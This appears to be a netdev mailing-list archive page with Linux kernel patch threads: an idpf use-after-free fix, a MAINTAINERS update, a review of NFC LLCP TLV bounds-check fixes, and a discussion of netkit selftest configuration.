> Am 11.04.26 um 12:12 schrieb Greg Kroah-Hartman:
> > When auxiliary_device_add() fails in idpf_plug_vport_aux_dev() or
> > idpf_plug_core_aux_dev(), the err_aux_dev_add label calls
> > auxiliary_device_uninit() and falls through to err_aux_dev_init. The
> > uninit call will trigger put_device(), which invokes the release
> > callback (idpf_vport_adev_release / idpf_core_adev_release) that frees
> > iadev. The fall-through then reads adev->id from the freed iadev for
> > ida_free() and double-frees iadev with kfree().
> >
> > Free the IDA slot and clear the back-pointer before uninit, while adev
> > is still valid, then return immediately.
> >
> > Commit 65637c3a1811 65637c3a1811 ("idpf: fix UAF in RDMA core aux dev
>
> The commit hash is pasted twice.
Argh, when I cut/paste from my terminal that happened, my fault.
> > deinitialization") fixed the same use-after-free in the matching unplug
> > path in this file but missed both probe error paths.
> >
> > Cc: Tony Nguyen <anthony.l.nguyen@intel.com>
> > Cc: Przemek Kitszel <przemyslaw.kitszel@intel.com>
> > Cc: Andrew Lunn <andrew+netdev@lunn.ch>
> > Cc: "David S. Miller" <davem@davemloft.net>
> > Cc: Eric Dumazet <edumazet@google.com>
> > Cc: Jakub Kicinski <kuba@kernel.org>
> > Cc: Paolo Abeni <pabeni@redhat.com>
> > Cc: stable <stable@kernel.org>
> > Fixes: be91128c579c ("idpf: implement RDMA vport auxiliary dev create, init, and destroy")
> > Fixes: f4312e6bfa2a ("idpf: implement core RDMA auxiliary dev create, init, and destroy")
> > Assisted-by: gregkh_clanker_t1000
> > Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
> > ---
> > Note, these cleanup paths are messy, but I couldn't see a simpler way
> > without a lot more rework, so I choose the simple way :)
> >
> > drivers/net/ethernet/intel/idpf/idpf_idc.c | 6 ++++++
> > 1 file changed, 6 insertions(+)
> >
> > diff --git a/drivers/net/ethernet/intel/idpf/idpf_idc.c b/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > index 7e4f4ac92653..b7d6b08fc89e 100644
> > --- a/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > +++ b/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > @@ -90,7 +90,10 @@ static int idpf_plug_vport_aux_dev(struct iidc_rdma_core_dev_info *cdev_info,
> > return 0;
> > err_aux_dev_add:
> > + ida_free(&idpf_idc_ida, adev->id);
> > + vdev_info->adev = NULL;
> > auxiliary_device_uninit(adev);
> > + return ret;
> > err_aux_dev_init:
> > ida_free(&idpf_idc_ida, adev->id);
> > err_ida_alloc:
> > @@ -228,7 +231,10 @@ static int idpf_plug_core_aux_dev(struct iidc_rdma_core_dev_info *cdev_info)
> > return 0;
> > err_aux_dev_add:
> > + ida_free(&idpf_idc_ida, adev->id);
> > + cdev_info->adev = NULL;
> > auxiliary_device_uninit(adev);
> > + return ret;
> > err_aux_dev_init:
> > ida_free(&idpf_idc_ida, adev->id);
> > err_ida_alloc:
>
> Reviewed-by: Paul Menzel <pmenzel@molgen.mpg.de>
>
> gemini/gemini-3.1-pro-preview has two comments [1]. Maybe the driver
> developers could judge their relevance.
These "pre-existing" reports are getting annoying. While they are nice
to see for driver authors, it makes developers sending bug fixes in feel
like they are forced to do "more". I think they are trying to tune this
to be a bit more sane...
thanks,
greg k-h
^ permalink raw reply
* [PATCH net-next] MAINTAINERS: Add netkit selftest files
From: Daniel Borkmann @ 2026-04-14 7:52 UTC (permalink / raw)
To: netdev; +Cc: kuba, dw, pabeni, razor
The following selftest files are related to netkit and should have
netkit folks in Cc for review:
- tools/testing/selftests/bpf/prog_tests/tc_netkit.c
- tools/testing/selftests/drivers/net/hw/nk_qlease.py
- tools/testing/selftests/net/nk_qlease.py
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
---
[ on top of https://lore.kernel.org/netdev/20260413220809.604592-1-daniel@iogearbox.net/ ]
MAINTAINERS | 3 +++
1 file changed, 3 insertions(+)
diff --git a/MAINTAINERS b/MAINTAINERS
index 65902b97f5df..fa1bdb1db73e 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -4901,6 +4901,9 @@ L: netdev@vger.kernel.org
S: Supported
F: drivers/net/netkit.c
F: include/net/netkit.h
+F: tools/testing/selftests/bpf/prog_tests/tc_netkit.c
+F: tools/testing/selftests/drivers/net/hw/nk_qlease.py
+F: tools/testing/selftests/net/nk_qlease.py
BPF [NETWORKING] (struct_ops, reuseport)
M: Martin KaFai Lau <martin.lau@linux.dev>
--
2.43.0
^ permalink raw reply related
* Re: [PATCH net v2 2/3] nfc: llcp: add TLV length bounds checks in parse_gb_tlv and parse_connection_tlv
From: Paolo Abeni @ 2026-04-14 7:52 UTC (permalink / raw)
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-3-snowwlake@icloud.com>
On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> v1 of this fix promoted `offset` from u8 to u16 in both TLV parsers,
> preventing the infinite loop when a connection TLV array exceeds 255 bytes.
> During review, Simon Horman identified two additional issues that the u16
> promotion alone does not address.
>
> Issue 1 - truncated TLV header:
>
> The loop guard `offset < tlv_array_len` is not sufficient to guarantee
> that reading tlv[0] (type) and tlv[1] (length) is safe. When exactly
> one byte remains (offset == tlv_array_len - 1) the loop body reads
> tlv[1] one byte past the end of the array.
>
> Issue 2 - peer-controlled `length` field:
>
> `length` is read from peer-supplied frame data and is not checked against
> the remaining array space before advancing `tlv` and `offset`:
>
> offset += length + 2; /* always */
> tlv += length + 2; /* may now point past buffer end */
>
> A crafted `length` advances `tlv` past the array boundary; the following
> iteration reads tlv[0]/tlv[1] from adjacent kernel memory.
>
> For nfc_llcp_parse_gb_tlv() this is particularly impactful: its input is
> &local->remote_gb[3], a field within nfc_llcp_local. A large `length`
> can walk `tlv` into adjacent struct fields including sdreq_timer and
> sdreq_timeout_work which contain kernel function pointers at approximately
> +176 and +216 bytes past remote_gb[]. The parsed `type` byte at those
> positions may match a recognized TLV type causing the parser to store
> bytes from the function pointer into local->remote_miu, which is
> subsequently readable via getsockopt().
>
> Issue 3 - zero-length TLV value:
>
> The llcp_tlv8() and llcp_tlv16() accessor helpers read tlv[2] and
> tlv[2..3] respectively. The outer guard guarantees `length` bytes of
> value are available past the two-byte header, but when length == 0 it
> only guarantees offset+2 <= tlv_array_len (non-strict), leaving tlv[2]
> out of bounds. Per-type minimum-length checks are required before each
> accessor call. Note: llcp_tlv8/16 additionally validate against the
> llcp_tlv_length[] table, providing a second safety layer; the per-type
> checks here make the rejection explicit and avoid silent zero-defaults.
>
> Fix: add two loop-level guards inside each parsing loop:
>
> if (tlv_array_len - offset < 2) /* need type + length */
> break;
> [read type, length]
> if (tlv_array_len - offset - 2 < length) /* need length value bytes */
> break;
>
> Both subtractions are safe: the loop condition guarantees offset <
> tlv_array_len; the first guard then guarantees the difference is >= 2,
> making the second subtraction non-negative.
>
> Add per-type minimum-length checks before each accessor call:
> - tlv8-based (VERSION, LTO, OPT, RW): require length >= 1
> - tlv16-based (MIUX, WKS): require length >= 2
>
> Reachability: nfc_llcp_parse_connection_tlv() is reached on receipt of a
> CONNECT or CC PDU before any connection is established.
> nfc_llcp_parse_gb_tlv() is reached during ATR_RES processing. Both are
> triggerable from any NFC peer within ~4 cm with no authentication.
It would be helpful if you could condense the above text in a
significantly shorter form. Also it looks like the issue addressed by v1
is not addressed anymore here.
>
> Reported-by: Simon Horman <horms@kernel.org>
> Fixes: 7a06e586b9bf ("NFC: Move LLCP receiver window value to socket structure")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/llcp_commands.c | 22 ++++++++++++++++++++++
> 1 file changed, 22 insertions(+)
>
> diff --git a/net/nfc/llcp_commands.c b/net/nfc/llcp_commands.c
> index 6937dcb3b..7cc237a6d 100644
> --- a/net/nfc/llcp_commands.c
> +++ b/net/nfc/llcp_commands.c
> @@ -202,25 +202,39 @@ int nfc_llcp_parse_gb_tlv(struct nfc_llcp_local *local,
> return -ENODEV;
>
> while (offset < tlv_array_len) {
> + if (tlv_array_len - offset < 2)
> + break;
> type = tlv[0];
> length = tlv[1];
> + if (tlv_array_len - offset - 2 < length)
> + break;
I *think* it would be better to bail out with an error, instead of
silently returning success. A similar consideration apply to the other
checks below.
>
> pr_debug("type 0x%x length %d\n", type, length);
>
> switch (type) {
> case LLCP_TLV_VERSION:
> + if (length < 1)
> + break;
> local->remote_version = llcp_tlv_version(tlv);
> break;
> case LLCP_TLV_MIUX:
> + if (length < 2)
> + break;
You can probably consolidate all the `length < 1` checks in the previous
one (before the switch statement and add here only `length < 2` check.
/P
^ permalink raw reply
* Re: [PATCH net-next v2 0/3] Follow-ups to nk_qlease net selftests
From: Daniel Borkmann @ 2026-04-14 7:51 UTC (permalink / raw)
To: Jakub Kicinski; +Cc: netdev, dw, pabeni, razor
In-Reply-To: <255394e2-fe42-4e3a-834b-42a0c7153f28@iogearbox.net>
On 4/14/26 9:33 AM, Daniel Borkmann wrote:
> On 4/14/26 4:12 AM, Jakub Kicinski wrote:
>> On Tue, 14 Apr 2026 00:08:03 +0200 Daniel Borkmann wrote:
>>> This is a set of follow-ups addressing [0]:
>>>
>>> - Split netdevsim tests from HW tests in nk_qlease and move the SW
>>> tests under selftests/net/
>>> - Remove multiple ksft_run()s to fix the recently enforced hard-fail
>>> - Move all the setup inside the test cases for the ones under
>>> selftests/net/ (I'll defer the HW ones to David)
>>> - Add more test coverage related to queue leasing behavior and corner
>>> cases, so now we have 45 tests in nk_qlease.py with netdevsim
>>> which does not need special HW
>>
>> LGTM, thanks!
>>
>> I'll let it run overnight in the CI to shake out any latent flakiness
>> (and the crash which I think is from Stan's series).
>>
>> Could you cook up one more follow up to enable VETH in the config?
>> We're getting:
>>
>> # # Exception| Traceback (most recent call last):
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/ksft.py", line 420, in ksft_run
>> # # Exception| func(*args)
>> # # Exception| ~~~~^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/drivers/net/hw/./nk_qlease.py", line 393, in test_veth_queue_create
>> # # Exception| ip("link add veth0 type veth peer name veth1")
>> # # Exception| ~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 238, in ip
>> # # Exception| return tool('ip', args, json=json, host=host)
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 225, in tool
>> # # Exception| cmd_obj = cmd(cmd_str, ns=ns, host=host)
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 91, in __init__
>> # # Exception| self.process(terminate=False, fail=fail, timeout=timeout)
>> # # Exception| ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 117, in process
>> # # Exception| raise CmdExitFailure("Command failed", self)
>> # # Exception| net.lib.py.utils.CmdExitFailure: Command failed
>> # # Exception| CMD: ip link add veth0 type veth peer name veth1
>> # # Exception| EXIT: 2
>> # # Exception| STDERR: Error: Unknown device type.
>> # # Exception|
>> # not ok 27 nk_qlease.test_veth_queue_create
>>
>> I guess you can post it without waiting for this to be merged, it won't
>> conflict.
>
> Ack, will take a look! Thanks!
After this series here, there is no veth test left anymore under
tools/testing/selftests/drivers/net/hw/ and they moved over to the
tools/testing/selftests/net/nk_qlease.py which already has the needed
CONFIG_VETH=y (in tools/testing/selftests/net/config).
Stan's series was run where this one here is not in the tree yet, so
if we would add CONFIG_VETH=y into tools/testing/selftests/drivers/net/hw/config
it would be unnecessary - I presume we don't want to add in that case.
Thanks,
Daniel
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox